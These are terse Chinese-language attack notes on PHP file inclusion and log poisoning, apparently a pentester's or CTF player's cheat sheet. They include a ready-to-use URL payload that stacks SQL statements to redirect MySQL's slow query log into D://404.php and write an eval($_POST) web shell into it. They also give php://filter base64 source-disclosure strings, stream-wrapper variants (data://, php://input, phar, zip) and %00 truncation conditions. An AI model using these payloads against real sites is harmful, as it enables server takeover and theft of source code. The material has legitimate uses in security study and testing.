开启日志的情况下
access.log
用burp让其转义,然后用文件包含可以执行其中代码
general_log
slow.log
set global slow_query_log=1;
set global slow_query_log_file='D://404.php' -- 地址
select '<?php eval($_POST['404']) ?>' or sleep(15);
例子
id=1%23;set global slow_query_log=1;set global slow_query_log_file='D://404.php' ;select '<?php eval($_POST['404']) ?>' or sleep(15);
执行完后去跟路径下去访问404.php
还有error.log日志
在以下情况
php伪协议
用php获取源码
param=php://filter/convert.base64-encode/resource=./index.php
==
param=php://filter/read=convert.base64-encode/resource=./index.php
php数据流封装器
变形,也是可以使用的
php对数据进行base64编码(PD9waHAgcGhwaW5mbygpOz8+是<?php phpinfo();?>的base64编码,+转义为url编码)
变形:
phar的压缩
zip的压缩
Zip是通过#号来区分zip下的文件,url要先编码所以为%23,zip必须用绝对路径
Phar和zip需要php版本大于5.3
Php://input,data://是需要双开allow_url_include = On,allow_url_fopen = On
对post的东西传入其中
文件上传
magic_quotes_gpc
注意单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线
PHP5.3.0中已经废弃并且在5.4.0中已经移除了magic_quotes_gpc
截断大概可以在以下情况适用
include(require)
file_get_contents
file_exists
所有url中参数可以用%00控制
本地文件包含
1.1 截断类型:php %00截断
截断条件:
php版本小于5.3.4 详情关注CVE-2006-7243
php的magic_quotes_gpc为OFF状态